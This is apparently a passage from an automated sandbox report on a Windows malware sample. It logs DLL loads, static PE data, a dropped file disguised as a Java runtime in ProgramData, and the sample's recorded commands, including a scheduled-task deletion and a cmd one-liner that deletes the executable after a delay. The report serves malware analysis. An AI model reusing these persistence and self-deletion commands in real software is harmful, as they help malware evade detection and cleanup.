Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: sE5IdDeTp2.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: sE5IdDeTp2.exeStatic file information: File size 1245320 > 1048576
Source: sE5IdDeTp2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: sE5IdDeTp2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: sE5IdDeTp2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: sE5IdDeTp2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: sE5IdDeTp2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: sE5IdDeTp2.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: sE5IdDeTp2.exeStatic PE information: section name: .00cfg
Source: dialer_java.exe.0.drStatic PE information: section name: .00cfg
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeCode function: 0_2_00007FF6099B1394 push qword ptr [00007FF6099E3004h]; ret 0_2_00007FF6099B1403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 16_2_00007FF6E3A61394 push qword ptr [00007FF6E3A93004h]; ret 16_2_00007FF6E3A61403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 17_2_00007FF6E3A61394 push qword ptr [00007FF6E3A93004h]; ret 17_2_00007FF6E3A61403
Source: C:\Windows\System32\conhost.exeCode function: 25_2_0000000140001394 push qword ptr [00000001400B3004h]; ret 25_2_0000000140001403
Source: C:\Windows\System32\conhost.exeCode function: 25_2_00000001400035D2 push rax; ret 25_2_00000001400035D4
Source: C:\Windows\System32\conhost.exeCode function: 25_2_00000001400746B0 push rdi; retf 25_2_00000001400746B6
Source: C:\Windows\System32\conhost.exeCode function: 25_2_00000001400746CB push rdi; ret 25_2_00000001400746CC
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 35_2_00007FF75B4A1394 push qword ptr [00007FF75B4D3004h]; ret 35_2_00007FF75B4A1403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 49_2_00007FF6ECFF1394 push qword ptr [00007FF6ED023004h]; ret 49_2_00007FF6ECFF1403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 69_2_00007FF71BD51394 push qword ptr [00007FF71BD83004h]; ret 69_2_00007FF71BD51403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 83_2_00007FF7C0EF1394 push qword ptr [00007FF7C0F23004h]; ret 83_2_00007FF7C0EF1403
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeCode function: 97_2_00007FF642721394 push qword ptr [00007FF642753004h]; ret 97_2_00007FF642721403
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeFile created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeJump to dropped file
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeFile created: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exeJump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /delete /f /tn "Oracle Corporation"

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"
Source: C:\Users\user\Desktop\sE5IdDeTp2.exeProcess created: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
